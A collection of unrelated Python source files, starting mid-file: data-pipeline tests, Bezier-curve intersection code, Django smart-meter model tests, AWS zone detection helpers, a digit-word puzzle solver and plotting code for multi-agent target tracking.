    """Outcome variable and variable groups are registered on the preprocessor."""
    dataset = ParquetDataset(str(datasets["dummy_df"]), tmp_path)
    dataset.add_outcome_variable("y")
    dataset.add_variable_group("features", [Numerical("dummy_col")])
    assert dataset.preprocessor.outcome_variable == "y"
    assert dataset.preprocessor.variable_group_keys == ["features"]
@pytest.mark.parametrize("transform", [Numerical, StandardNormalizer])
def test_parquet_dataset_analyze(transform, test_df, datasets, tmp_path):
    """analyze() persists a Preprocessor that can be reloaded; normalizing
    transforms additionally store per-feature statistics."""
    test_df_path = str(datasets["dummy_df"])
    preprocessor_loc = str(Path(tmp_path) / "preprocessor")
    ds = ParquetDataset(test_df_path, tmp_path)
    ds.add_outcome_variable("y")
    ds.add_variable_group("features", [transform("f_ints")])
    ds.analyze(pandas_df=test_df, preprocessor_loc=preprocessor_loc)
    # Reload from disk to verify the persisted state, not the in-memory one.
    load_preprocessor = Preprocessor()
    load_preprocessor.load(preprocessor_loc)
    assert load_preprocessor.outcome_variable == "y"
    assert load_preprocessor.variable_group_keys == ["features"]
    if transform == Numerical:
        # Plain numerical features require no analysis statistics.
        assert load_preprocessor.analysis_data == {"features": {}}
    elif transform == StandardNormalizer:
        # Standard normalization stores the moments needed at transform time.
        for k in ["avg", "max", "min", "stddev"]:
            assert f"features_f_ints_{k}" in load_preprocessor.analysis_data["features"]
def test_parquet_dataset_to_tf(test_df, datasets, tmp_path):
    """to_tf() yields (features, labels) batches of the requested size."""
    test_df_path = str(datasets["dummy_df"])
    preprocessor_loc = str(Path(tmp_path) / "preprocessor")
    transformed_data_loc = str(Path(tmp_path) / "transformed_data")
    ds = ParquetDataset(test_df_path, tmp_path, transformed_data_loc=transformed_data_loc)
    ds.add_outcome_variable("y")
    ds.add_variable_group("features", [Numerical("f_ints")])
    ds.analyze_transform(preprocessor_loc=preprocessor_loc, pandas_df=test_df, out_files_per_proc=1)
    batch = next(ds.to_tf(batch_size=2))
    # batch[0]: feature dict keyed by column; batch[1]: labels.
    assert list(batch[0]) == ["f_ints"]
    assert len(batch[0]["f_ints"]) == 2
    assert len(batch[1]) == 2
def test_parquet_dataset_to_torch(test_df, datasets, tmp_path):
    """to_torch() yields (features, labels) batches of the requested size."""
    test_df_path = str(datasets["dummy_df"])
    preprocessor_loc = str(Path(tmp_path) / "preprocessor")
    transformed_data_loc = str(Path(tmp_path) / "transformed_data")
    ds = ParquetDataset(test_df_path, tmp_path, transformed_data_loc=transformed_data_loc)
    ds.add_outcome_variable("y")
    ds.add_variable_group("features", [Numerical("f_ints")])
    ds.analyze_transform(preprocessor_loc=preprocessor_loc, pandas_df=test_df, out_files_per_proc=1)
    # Unlike to_tf, the torch loader is an iterable, hence iter() first.
    batch = next(iter(ds.to_torch(batch_size=2)))
    assert list(batch[0]) == ["f_ints"]
    assert len(batch[0]["f_ints"]) == 2
    assert len(batch[1]) == 2
@patch("zenithml.data.core.BQRunner")
def test_bq_dataset(mock_bq_runner, datasets, tmp_path):
    """BQDataset materializes the BigQuery table via BQRunner.to_parquet and
    then behaves like a parquet-backed dataset."""
    test_df_path = str(datasets["dummy_df"])
    # Redirect the BigQuery export to the local dummy parquet fixture.
    mock_bq_runner().to_parquet.return_value = test_df_path
    ds = BQDataset(bq_table="project.dataset.table", gcs_datasets_dir="gs://dummy", working_dir=tmp_path)
    assert ds.base_nvt_dataset.num_rows == 5
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import de_casteljau
import eft
def standard_residual(s, coeffs1, t, coeffs2):
    """Residual F(s, t) = B1(s) - B2(t) of two planar Bezier curves, evaluated
    with the standard de Casteljau algorithm; returned as a 2x1 column."""
    curve1_x = de_casteljau.basic(s, coeffs1[0, :])
    curve1_y = de_casteljau.basic(s, coeffs1[1, :])
    curve2_x = de_casteljau.basic(t, coeffs2[0, :])
    curve2_y = de_casteljau.basic(t, coeffs2[1, :])
    return np.array([[curve1_x - curve2_x], [curve1_y - curve2_y]])
def compensated_residual(s, coeffs1, t, coeffs2):
    """Residual B1(s) - B2(t) evaluated with compensated (error-free
    transformation) arithmetic for extra precision near an intersection.

    `_compensated_k(..., 2)` appears to return a (value, error) pair; the
    final subtraction is done with an EFT add so that its rounding error
    `sigma` can be folded back in together with the accumulated per-curve
    error terms. The order of operations is significant and must not be
    rearranged.
    """
    x1, dx1 = de_casteljau._compensated_k(s, coeffs1[0, :], 2)
    y1, dy1 = de_casteljau._compensated_k(s, coeffs1[1, :], 2)
    x2, dx2 = de_casteljau._compensated_k(t, coeffs2[0, :], 2)
    y2, dy2 = de_casteljau._compensated_k(t, coeffs2[1, :], 2)
    # x-component: exact sum x1 + (-x2) = dx + sigma, then add the error terms
    dx, sigma = eft.add_eft(x1, -x2)
    tau = (dx1 - dx2) + sigma
    dx += tau
    # y-component, same scheme
    dy, sigma = eft.add_eft(y1, -y2)
    tau = (dy1 - dy2) + sigma
    dy += tau
    return np.array([[dx], [dy]])
def newton(s0, coeffs1, t0, coeffs2, residual):
    """Newton's method for the curve-intersection system B1(s) - B2(t) = 0.

    Runs at most 50 iterations, stopping early once the parameter update's
    2-norm falls below 1e-15, and returns the list of (s, t) iterates.
    """
    max_iter = 50
    tol = 1e-15
    s, t = s0, t0
    iterates = []
    for _ in range(max_iter):
        rhs = residual(s, coeffs1, t, coeffs2)
        # Jacobian of the residual: first column d/ds of B1, second column
        # -d/dt of B2 (standard, uncompensated derivatives).
        j11 = de_casteljau.derivative(s, coeffs1[0, :])
        j21 = de_casteljau.derivative(s, coeffs1[1, :])
        j12 = de_casteljau.derivative(t, coeffs2[0, :])
        j22 = de_casteljau.derivative(t, coeffs2[1, :])
        jacobian = np.array([[j11, -j12], [j21, -j22]])
        # Newton step: J [ds, dt]^T = F, then move against the step.
        ds, dt = np.linalg.solve(jacobian, rhs).flatten()
        s -= ds
        t -= dt
        iterates.append((s, t))
        # Converged once the update is below the tolerance (2-norm).
        if np.linalg.norm([ds, dt], ord=2) < tol:
            break
    return iterates
|
import os
def processFiles(dirPath, dstFilePath):
    """Concatenate the contents of every file in `dirPath` into `dstFilePath`.

    Files are processed in os.listdir order. FIX: the original never closed
    any of the file handles -- the destination in particular might never be
    flushed before interpreter exit; `with` guarantees close/flush.
    """
    with open(dstFilePath, 'w') as new_f:
        for file in os.listdir(dirPath):
            file_path = os.path.join(dirPath, file)
            with open(file_path, 'r') as f:
                for line in f:
                    new_f.write(line)
if __name__ == '__main__':
    # NOTE(review): the source directory is a machine-specific Windows path
    # and the destination is relative to the current working directory.
    processFiles('C:\\Users\\shankai\\Desktop\\result','data/sendBiaoqingWithPrefetchNoOrigin.txt')
from django.test import TestCase, tag
from smart_meter.models import GroupParticipant
from smart_meter.tests.mixin import MeterTestMixin
@tag('model')
class TestGroupParticipantModel(MeterTestMixin, TestCase):
    """Model tests for GroupParticipant: saving snapshots the meter's values,
    total/actual properties track the meter while active, and leaving
    deactivates the participation."""

    @classmethod
    def setUpTestData(cls):
        # One user and group shared by the whole test class.
        super().setUpTestData()
        cls.user = cls.create_user()
        cls.some_group = cls.create_group_meter()

    def setUp(self):
        # A fresh meter per test so meter mutations never leak across tests.
        self.meter = self.create_smart_meter(self.user)

    @tag('model')
    def test_group_participant_save_success(self):
        """Saving a new participant activates it and copies the meter values."""
        # given
        participant = GroupParticipant(meter=self.meter, group=self.some_group, )
        # when
        participant.save()
        # then
        # Should be active
        self.assertTrue(participant.active)
        # Should have copied over the initial meter values
        self.assertEqual(self.meter.name, participant.display_name)
        self.assertEqual(self.meter.power_import, participant.power_import_joined)
        self.assertEqual(self.meter.power_export, participant.power_export_joined)
        self.assertEqual(self.meter.total_gas, participant.gas_joined)

    @tag('model')
    def test_group_participant_total_properties_active_success(self):
        """While active, totals reflect meter increases since joining."""
        # given
        participant = self.create_group_participation(self.meter, self.some_group)
        self.meter.total_power_import_1 += 1
        self.meter.total_power_import_2 += 1
        self.meter.total_power_export_1 += 1
        self.meter.total_power_export_2 += 1
        self.meter.total_gas += 1
        self.meter.save()
        # when
        participant.refresh_from_db()
        # then
        self.assertEqual(2, participant.total_import)
        self.assertEqual(2, participant.total_export)
        self.assertEqual(1, participant.total_gas)

    @tag('model')
    def test_group_participant_total_properties_inactive_success(self):
        """Totals accrued before leaving are preserved after leaving."""
        # given
        participant = self.create_group_participation(self.meter, self.some_group)
        self.meter.total_power_import_1 += 1
        self.meter.total_power_import_2 += 1
        self.meter.total_power_export_1 += 1
        self.meter.total_power_export_2 += 1
        self.meter.total_gas += 1
        self.meter.save()
        # when
        participant.refresh_from_db()
        participant.leave()
        participant.save()
        # then
        participant.refresh_from_db()
        self.assertEqual(2, participant.total_import)
        self.assertEqual(2, participant.total_export)
        self.assertEqual(1, participant.total_gas)

    @tag('model')
    def test_group_participant_actual_properties_active_success(self):
        """While active, actual readings mirror the meter's current values."""
        # given
        participant = self.create_group_participation(self.meter, self.some_group)
        self.meter.actual_power_import = 2
        self.meter.actual_power_export = 0
        self.meter.actual_gas = 3
        self.meter.actual_solar = 4
        self.meter.save()
        # when
        participant.refresh_from_db()
        # then
        # actual power = export - import
        self.assertEqual(-2, participant.actual_power)
        self.assertEqual(3, participant.actual_gas)
        self.assertEqual(4, participant.actual_solar)

    @tag('model')
    def test_group_participant_actual_properties_inactive_success(self):
        """After leaving, actual readings no longer follow the meter."""
        # given
        participant = self.create_group_participation(self.meter, self.some_group)
        self.meter.actual_power_import = 2
        self.meter.actual_power_export = 0
        self.meter.actual_gas = 3
        self.meter.actual_solar = 4
        self.meter.save()
        # when
        participant.refresh_from_db()
        participant.leave()
        participant.save()
        # then
        self.assertEqual(0, participant.actual_power)
        self.assertEqual(0, participant.actual_gas)
        self.assertEqual(None, participant.actual_solar)

    @tag('model')
    def test_group_participant_leave_success(self):
        """leave() deactivates the participation and stamps the leave time."""
        # given
        participant = self.create_group_participation(self.meter, self.some_group)
        # when
        participant.leave()
        participant.save()
        # then
        self.assertFalse(participant.active)
        self.assertIsNotNone(participant.left_on)

    @tag('manager')
    def test_group_participant_manager_active_success(self):
        """The manager's active() queryset excludes left participants."""
        # given
        participant1 = self.some_group.participants.first()  # 1st participant already created in setup
        participant2 = self.create_group_participation(self.meter, self.some_group)
        participant3 = self.create_group_participation(self.meter, self.some_group)
        inactive_participant3 = self.create_group_participation(self.meter, self.some_group)
        inactive_participant3.leave()
        inactive_participant3.save()
        # when
        participants = GroupParticipant.objects.active()
        # then
        self.assertEqual(3, participants.count())
        for p in participants:
            self.assertIn(p.pk, [participant1.pk, participant2.pk, participant3.pk])
|
import numpy as np
from typing import Tuple, Iterable, Generator
# A little bit of sugar for type hints
# A little bit of sugar for type hints
Array = np.ndarray


def all_equals(iterable: Iterable) -> bool:
    """Return `True` if all elements of a given `iterable` are equals,
    otherwise return `False`.

    An empty iterable counts as "all equal". Elements must be hashable.
    """
    return len(set(iterable)) <= 1


def enumerate_arrays(*arrays: Tuple[Array]) -> Generator:
    """Same as NumPy's `ndenumerate` function, except it allows enumerating
    multiple `ndarray`s.

    Yields `(indexes, values)` where `values` is a tuple with the element of
    each array at `indexes`.
    """
    assert all_equals(a.shape for a in arrays), "Array shape mismatch"
    for indexes in np.ndindex(arrays[0].shape):
        # BUG FIX: materialize a tuple here. The original yielded a lazy
        # generator that closed over the loop variable `indexes`, so any
        # consumer reading it after the loop advanced got the elements at a
        # *later* index (classic late-binding pitfall). A tuple still
        # unpacks/iterates exactly like the generator did.
        yield indexes, tuple(a[indexes] for a in arrays)
|
# Copyright (C) 2015-2021 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import inspect
import logging
import os
import re
import socket
import threading
from functools import lru_cache
from urllib.request import urlopen
from urllib.error import URLError
from typing import Any, Callable, Dict, Iterable, List, Optional, TypeVar, Union
logger = logging.getLogger(__name__)
# This file isn't allowed to import anything that depends on Boto or Boto3,
# which may not be installed, because it has to be importable everywhere.
def get_current_aws_region() -> Optional[str]:
    """
    Return the AWS region that the currently configured AWS zone (see
    get_current_aws_zone()) is in.
    """
    zone = get_current_aws_zone()
    if not zone:
        return None
    return zone_to_region(zone)
def get_aws_zone_from_environment() -> Optional[str]:
    """
    Get the AWS zone from TOIL_AWS_ZONE if set.
    """
    return os.environ.get('TOIL_AWS_ZONE')
def get_aws_zone_from_metadata() -> Optional[str]:
    """
    Get the AWS zone from instance metadata, if on EC2 and the boto module is
    available.
    """
    if not running_on_ec2():
        return None
    try:
        from boto.utils import get_instance_metadata
        return get_instance_metadata()['placement']['availability-zone']
    except (KeyError, ImportError):
        return None
def get_aws_zone_from_boto() -> Optional[str]:
    """
    Get the AWS zone from the Boto config file, if it is configured and the
    boto module is available.
    """
    try:
        import boto
        region_name = boto.config.get('Boto', 'ec2_region_name')
    except ImportError:
        return None
    if region_name is None:
        return None
    # Derive an availability zone in the region.
    return region_name + 'a'
def get_current_aws_zone() -> Optional[str]:
    """
    Get the currently configured or occupied AWS zone to use.
    Reports the TOIL_AWS_ZONE environment variable if set.
    Otherwise, if we have boto and are running on EC2, reports the zone we are
    running in.
    Finally, if we have boto2, and a default region is configured in Boto 2,
    chooses a zone in that region.
    Returns None if no method can produce a zone to use.
    """
    # Sources in decreasing order of precedence; first truthy answer wins.
    for source in (get_aws_zone_from_environment,
                   get_aws_zone_from_metadata,
                   get_aws_zone_from_boto):
        zone = source()
        if zone:
            return zone
    return None
def zone_to_region(zone: str) -> str:
    """Get a region (e.g. us-west-2) from a zone (e.g. us-west-1c)."""
    # A zone is '<region><one letter>'; capture the region part.
    # re.compile() caches the regex internally so we don't have to.
    pattern = re.compile(r'^([a-z]{2}-[a-z]+-[1-9][0-9]*)([a-z])$')
    match = pattern.match(zone)
    if match is None:
        raise ValueError(f"Can't extract region from availability zone '{zone}'")
    return match.group(1)
def running_on_ec2() -> bool:
    """
    Return True if we are currently running on EC2, and false otherwise.
    """
    # TODO: Move this to toil.lib.ec2 and make toil.lib.ec2 importable without boto?
    def starts_with(path: str, prefix: str) -> bool:
        with open(path) as stream:
            return stream.read(len(prefix)) == prefix

    hv_uuid_path = '/sys/hypervisor/uuid'
    if os.path.exists(hv_uuid_path) and starts_with(hv_uuid_path, 'ec2'):
        return True
    # Some instances do not have the /sys/hypervisor/uuid file, so check the identity document instead.
    # See https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
    try:
        urlopen('http://169.254.169.254/latest/dynamic/instance-identity/document', timeout=1)
        return True
    except (URLError, socket.timeout):
        return False
|
def checkAll(s, str, res, v):
    """Try to remove one occurrence of every character of `s` from `str`.

    If every character is found, append `v` to `res` and return the reduced
    string; otherwise return `str` unchanged (and leave `res` untouched).
    Note: the parameter `str` shadows the builtin; kept for compatibility.
    """
    new_str = str
    for c in s:
        temp = new_str.replace(c, "", 1)
        # BUG FIX: the original compared the lengths with `is`, which relies
        # on CPython's small-int cache and silently breaks (here: loops
        # forever in check()) for strings longer than ~256 characters.
        if len(new_str) == len(temp):
            return str
        new_str = temp
    res.append(v)
    return new_str
def check(s):
    """Greedily decode a string of scrambled digit words into digits.

    Repeatedly strips each word ZERO..NINE (in that order) from `s`,
    recording the digit for every successful removal.
    """
    l = ["ZERO", "ONE", "TWO", "THREE", "FOUR", "FIVE", "SIX", "SEVEN", "EIGHT", "NINE"]
    res = []
    i = 0
    while i < len(l):
        num = l[i]
        temp = checkAll(num, s, res, i)
        # BUG FIX: same `is` -> `==` change; equal length means nothing was
        # removed, so advance to the next word.
        if len(temp) == len(s):
            i += 1
        s = temp
    return ''.join(map(str, res))
def main():
    # Python 2 entry point (raw_input and print-statement syntax): reads the
    # number of test cases, then one scrambled digit-word line per case.
    t = int(raw_input())
    for i in range(1, t + 1):
        print "Case #%d: %s" % (i, check(raw_input()))
if __name__ == '__main__':
    main()
|
from src.multi_agent.agent.agent_interacting_room_camera import AgentCam
from src.my_utils.my_IO.IO_data import *
from src.my_utils.my_math.MSE import error_squared_list, error_squared_x_y_list
from src.plot_functions.plot_toolbox import plot_graph_x_y
from src.my_utils.my_math.MSE import *
from src.plot_functions.plot_toolbox import *
import matplotlib.pyplot as plt
# Column index of each field in a target-memory data row; units are taken
# from the axis labels used by the plotting helpers below.
TIME_TO_COMPARE = 0
TIME_INDEX = 1    # time [s]
AGENT_INDEX = 2   # id of the agent that produced the estimate
TYPE_INDEX = 6    # target type
X_INDEX = 7       # position x [m]
Y_INDEX = 8       # position y [m]
VX_INDEX = 9      # velocity x [m/s]
VY_INDEX = 10     # velocity y [m/s]
AX_INDEX = 11     # acceleration x [m/s^2]
AY_INDEX = 12     # acceleration y [m/s^2]
RADIUS_INDEX = 13 # target radius [m]
def plot_target_memory_type_x_y_2D(ax, data, curve_label="Title Here"):
return plot_graph_3D_2D(ax, data[X_INDEX], data[Y_INDEX], data[TYPE_INDEX], data[RADIUS_INDEX], 0, 3,
"Trajectory x-y plane (type in color)", "x [m]", "y [m]",
curve_label=curve_label)
def plot_target_memory_time_x_y_2D(ax, data, curve_label="curve_label"):
    """Scatter the x-y trajectory on *ax*, coloured by timestamp (scale T_MIN..T_MAX)."""
    xs, ys = data[X_INDEX], data[Y_INDEX]
    colours, radii = data[TIME_INDEX], data[RADIUS_INDEX]
    return plot_graph_3D_2D(ax, xs, ys, colours, radii, T_MIN, T_MAX,
                            "Trajectory x-y plane (time [s] in color)", "x [m]", "y [m]",
                            curve_label=curve_label)
def plot_target_memory_agent_x_y_2D(ax, data, curve_label="curve_label"):
    """Scatter the x-y trajectory on *ax*, coloured by the id of the agent
    that produced each point (scale 0..number of cameras - 1)."""
    colour_max = AgentCam.number_agentCam_created - 1
    return plot_graph_3D_2D(ax, data[X_INDEX], data[Y_INDEX], data[AGENT_INDEX],
                            data[RADIUS_INDEX], 0, colour_max,
                            "Trajectory x-y plane (agent id in color)",
                            "x [m]", "y [m]", curve_label=curve_label)
def plot_target_memory_agent_vx_vy_2D(ax, data, curve_label="curve_label"):
    """Scatter the velocity plane (vx, vy) on *ax*, coloured by agent id."""
    colour_max = AgentCam.number_agentCam_created - 1
    return plot_graph_3D_2D(ax, data[VX_INDEX], data[VY_INDEX], data[AGENT_INDEX],
                            data[RADIUS_INDEX], 0, colour_max, "x-y plane agent",
                            "vx [m/s]", "vy [m/s]", curve_label=curve_label)
def plot_target_memory_agent_ax_ay_2D(ax, data, curve_label="curve_label"):
    """Scatter the acceleration plane (ax, ay) on *ax*, coloured by agent id (scale 0-2)."""
    accel_x, accel_y = data[AX_INDEX], data[AY_INDEX]
    return plot_graph_3D_2D(ax, accel_x, accel_y, data[AGENT_INDEX], data[RADIUS_INDEX],
                            0, 2, "x-y plane agent",
                            "ax [m/s^2]", "ay [m/s^2]", curve_label=curve_label)
def plot_target_memory_x_y(ax, data, curve_label="curve_label", **kwargs):
    """Line-plot the x-y trajectory on *ax*.

    Extra keyword arguments (e.g. ``symb``, ``color``) are forwarded to
    plot_graph_x_y.  Bug fix / generalization: callers elsewhere in this
    module (plot_rapport, plot_all_target_simulated_data_collected_data)
    already pass ``symb=`` and ``color=``, which the original fixed signature
    rejected with a TypeError.
    """
    plot_graph_x_y(ax, data[X_INDEX], data[Y_INDEX],
                   "Trajectory x-y plane (time [s] in color)", "x [m]", "y [m]",
                   curve_label=curve_label, **kwargs)
def plot_target_memory_time_x(ax, data, curve_label="curve_label"):
    """Plot the x coordinate against time on *ax*."""
    times, xs = data[TIME_INDEX], data[X_INDEX]
    plot_graph_time_x(ax, times, xs, "X in terms of time", "time [s]", "x [m]",
                      curve_label=curve_label)
def plot_target_memory_time_y(ax, data, curve_label="curve_label"):
    """Plot the y coordinate against time on *ax*."""
    times, ys = data[TIME_INDEX], data[Y_INDEX]
    plot_graph_time_x(ax, times, ys, "Y in terms of time", "time [s]", "y [m]",
                      curve_label=curve_label)
def plot_target_memory_time_agent(ax, data, curve_label="curve_label"):
    """Plot, against time, the id of the agent that generated each estimate."""
    times, agent_ids = data[TIME_INDEX], data[AGENT_INDEX]
    plot_graph_time_x(ax, times, agent_ids, "Agent generating info in terms of time",
                      "time [s]", "Agent [id]",
                      curve_label=curve_label)
def plot_target_memory_type_x_y_3D(ax, data):
    """3-D trajectory plot with time on the third axis.
    NOTE(review): despite the "type" in the name, TIME_INDEX is passed as the
    third coordinate — possibly a copy-paste from the time variant; confirm."""
    xs, ys = data[X_INDEX], data[Y_INDEX]
    plot_graph_3D(ax, xs, ys, data[TIME_INDEX], "x-y plane, type", "x [m]", "y [m]")
def plot_target_memory_time_x_y_3D(ax, data):
    """3-D trajectory plot with time on the third axis."""
    xs, ys = data[X_INDEX], data[Y_INDEX]
    plot_graph_3D(ax, xs, ys, data[TIME_INDEX], "x-y plane, time", "x [m]", "y [m]")
def plot_time_type_x_y_agent(list):
    """Draw a 2x2 summary figure for every target container in *list*:
    trajectory coloured by time, by type, by agent id, and agent id vs time.
    NOTE(review): the parameter shadows the builtin `list`; name kept for callers.
    """
    summary_figure = plt.figure()
    axes = [summary_figure.add_subplot(2, 2, position) for position in (1, 2, 3, 4)]
    for element in list:
        plot_target_memory_time_x_y_2D(axes[0], element.data_list)
        plot_target_memory_type_x_y_2D(axes[1], element.data_list)
        plot_target_memory_agent_x_y_2D(axes[2], element.data_list)
        plot_target_memory_time_agent(axes[3], element.data_list)
def plot_time_type_x_y(list):
    """Draw a 1x2 figure for every target container in *list*: trajectory
    coloured by time (left) and by type (right).
    NOTE(review): the parameter shadows the builtin `list`; name kept for callers.
    """
    summary_figure = plt.figure()
    axes = [summary_figure.add_subplot(1, 2, position) for position in (1, 2)]
    for element in list:
        plot_target_memory_time_x_y_2D(axes[0], element.data_list)
        plot_target_memory_type_x_y_2D(axes[1], element.data_list)
def plot_time_x_y(list):
    """Plot each target's x-y trajectory coloured by time: standalone 2D and
    3D figures, plus a combined figure (3D left, 2D right).

    NOTE(review): the parameter shadows the builtin `list`; name kept for callers.
    """
    fig_time_x_y_3D = plt.figure()
    fig_time_x_y_2D = plt.figure()
    fig_time_x_y = plt.figure()
    ax1 = fig_time_x_y.add_subplot(1, 2, 1, projection='3d')
    ax2 = fig_time_x_y.add_subplot(1, 2, 2)
    # Bug fix: Figure.gca(projection='3d') was deprecated in Matplotlib 3.4
    # and removed in 3.7.  Create the axes once up front instead — same effect
    # as the old gca() reuse: every iteration draws into the same axes.
    ax_2d = fig_time_x_y_2D.add_subplot(1, 1, 1)
    ax_3d = fig_time_x_y_3D.add_subplot(1, 1, 1, projection='3d')
    for element in list:
        plot_target_memory_time_x_y_2D(ax_2d, element.data_list)
        plot_target_memory_time_x_y_3D(ax_3d, element.data_list)
        plot_target_memory_time_x_y_2D(ax2, element.data_list)
        plot_target_memory_time_x_y_3D(ax1, element.data_list)
def init_analyse_memory_agent(list_init, list_sort):
    """Group raw CSV estimator rows from *list_init* into per-target
    TargetSortedTargetEstimator containers appended to *list_sort*, which is
    left sorted by target_id.
    """
    for data_element in list_init:
        is_in_list = False
        for element in list_sort:
            if int(data_element['target_id']) == element.target_id:
                element.add_target_estimator(data_element)
                is_in_list = True
                break
        if not is_in_list:
            # First row seen for this target: create its container and add the
            # row.  (Bug fix: these notes were bare string expressions — no-op
            # statements — in the original; now real comments.)
            target_created = TargetSortedTargetEstimator(data_element['target_id'],
                                                         data_element['target_signature'])
            target_created.add_target_estimator(data_element)
            list_sort.append(target_created)
    list_sort.sort()
def init_analyse_memory_all_agent(list_init, list_sort):
    """Group raw CSV estimator rows into AgentSortedTargetEstimator containers
    (one per agent), each holding per-target TargetSortedTargetEstimator
    containers; both levels of *list_sort* are left sorted by id.

    (Bug fix: the inline notes were bare string expressions — no-op
    statements — in the original; now real comments.)
    """
    for data_element in list_init:
        is_in_list_agent = False
        is_in_list_target = False
        for agent_element in list_sort:
            if agent_element.agent_id == int(data_element['agent_id']):
                is_in_list_agent = True
                for target_element in agent_element.data_list:
                    if target_element.target_id == int(data_element['target_id']):
                        is_in_list_target = True
                        target_element.add_target_estimator(data_element)
                        break
                if not is_in_list_target:
                    # Known agent, new target: create the target container.
                    target_created = TargetSortedTargetEstimator(data_element['target_id'],
                                                                 data_element['target_signature'])
                    target_created.add_target_estimator(data_element)
                    agent_element.data_list.append(target_created)
                break
        if not is_in_list_agent:
            # First row seen for this agent: create both containers.
            agent_created = AgentSortedTargetEstimator(data_element['agent_id'], data_element['agent_signature'])
            target_created = TargetSortedTargetEstimator(data_element['target_id'], data_element['target_signature'])
            target_created.add_target_estimator(data_element)
            agent_created.data_list.append(target_created)
            list_sort.append(agent_created)
    list_sort.sort()
    for elem in list_sort:
        elem.data_list.sort()
class TargetSortedTargetEstimator:
    """Per-target column store of estimator rows.

    data_list[i] collects the values of the i-th field of
    constants.TARGET_ESTIMATOR_CSV_FIELDNAMES across all rows added.
    Instances compare and sort by target_id.
    NOTE(review): defining __eq__ without __hash__ makes instances unhashable;
    fine for the list-sorting done here.
    """
    def __init__(self, target_id, target_signature):
        self.target_id = int(target_id)
        self.target_signature = int(target_signature)
        self.data_list = []
        self.init()
    def init(self):
        # One empty column per CSV field (comprehension replaces append loop).
        self.data_list += [[] for _ in range(len(constants.TARGET_ESTIMATOR_CSV_FIELDNAMES))]
    def add_target_estimator(self, data):
        """Append one CSV row (a field-name -> value mapping), converting each
        field to float when possible and keeping the raw value otherwise."""
        for i in range(len(constants.TARGET_ESTIMATOR_CSV_FIELDNAMES)):
            try:
                self.data_list[i].append(float(data[constants.TARGET_ESTIMATOR_CSV_FIELDNAMES[i]]))
            except ValueError:
                # Non-numeric field: keep as-is (debug print kept on purpose).
                print("problème pas grave mais c'est bien que ça print pour pas oublier")
                self.data_list[i].append(data[constants.TARGET_ESTIMATOR_CSV_FIELDNAMES[i]])
    def __eq__(self, other):
        return self.target_id == other.target_id
    def __lt__(self, other):
        return self.target_id < other.target_id
    def __gt__(self, other):
        return self.target_id > other.target_id
class AgentSortedTargetEstimator:
    """Per-agent container of TargetSortedTargetEstimator objects.

    data_list holds one entry per target seen for this agent; instances
    compare and sort by agent_id.
    """
    def __init__(self, agent_id, agent_signature):
        self.agent_id = int(agent_id)
        self.agent_signature = int(agent_signature)
        # Filled by init_analyse_memory_all_agent.
        self.data_list = []
    def __eq__(self, other):
        return other.agent_id == self.agent_id
    def __lt__(self, other):
        return other.agent_id > self.agent_id
    def __gt__(self, other):
        return other.agent_id < self.agent_id
class Analyser_Target_TargetEstimator_FormatCSV:
    """Loads one agent's measured estimator CSV plus the simulation reference
    CSV, groups both by target, and renders comparison / error plots to
    *path_to_save_data*.

    NOTE(review): most plotting methods wrap their body in a bare ``except:``
    that only prints a short message — real failures (including typos) are
    silently swallowed.  Consider ``except Exception`` + ``logger.exception``.
    """
    def __init__(self, agent_id, path_to_load_data, path_to_save_data, version="version"):
        # agent_id "" selects the reference-only ("ideal solution") data set.
        self.id = agent_id
        self.version = version
        self.path_to_save_data = path_to_save_data
        self.data = load_csv_file_dictionnary(path_to_load_data + str(agent_id))
        self.simulated_data = load_csv_file_dictionnary(constants.ResultsPath.SAVE_LOAD_DATA_REFERENCE)
        # Measured and reference rows, grouped per target id.
        self.data_sort_by_target = []
        self.simulated_data_sort_by_target = []
        init_analyse_memory_agent(self.data, self.data_sort_by_target)
        init_analyse_memory_agent(self.simulated_data, self.simulated_data_sort_by_target)
    def get_MSE(self, target_id):
        # Root-mean of the squared position error between reference and
        # measured tracks for one target (outlier removal enabled).
        data_ref = []
        data_mes = []
        for element in self.simulated_data_sort_by_target:
            if target_id == int(element.target_id):
                data_ref = element.data_list
        for element in self.data_sort_by_target:
            if target_id == int(element.target_id):
                data_mes = element.data_list
        (t_ref, x_ref, y_ref, x_mes, y_mes, error_squared_x, error_squared_y,
         error_squared) = error_squared_discrete(
            data_ref, data_mes, True)
        return np.sqrt(np.mean(error_squared))
    def plot_rapport(self, target_id):
        # Report figures: fig1 = reference vs measured trajectories (with
        # time/agent colouring), fig2 = generating agent vs time.
        fig1 = plt.figure(figsize=(20, 8))
        ax1 = fig1.add_subplot(1, 2, 1)
        ax2 = fig1.add_subplot(1, 2, 2)
        fig2 = plt.figure(figsize=(12, 8))
        ax3 = fig2.add_subplot(1, 1, 1)
        ax1.xaxis.set_tick_params(labelsize=20)
        ax1.yaxis.set_tick_params(labelsize=20)
        ax2.xaxis.set_tick_params(labelsize=20)
        ax2.yaxis.set_tick_params(labelsize=20)
        ax3.xaxis.set_tick_params(labelsize=20)
        ax3.yaxis.set_tick_params(labelsize=20)
        for element in self.simulated_data_sort_by_target:
            sc1 = plot_target_memory_time_x_y_2D(ax1, element.data_list,
                                                 curve_label="target" + str(element.target_id) + " - ref")
            plot_target_memory_x_y(ax1, element.data_list, curve_label="target" + str(element.target_id) + " - ref")
        for element in self.data_sort_by_target:
            # NOTE(review): plot_target_memory_x_y as defined above does not
            # accept symb/color — confirm it forwards extra kwargs.
            plot_target_memory_x_y(ax1, element.data_list, curve_label="target" + str(element.target_id) + " - mes",
                                   symb="*", color="gold")
            sc2 = plot_target_memory_agent_x_y_2D(ax2, element.data_list,
                                                  curve_label="target" + str(element.target_id) + " - mes")
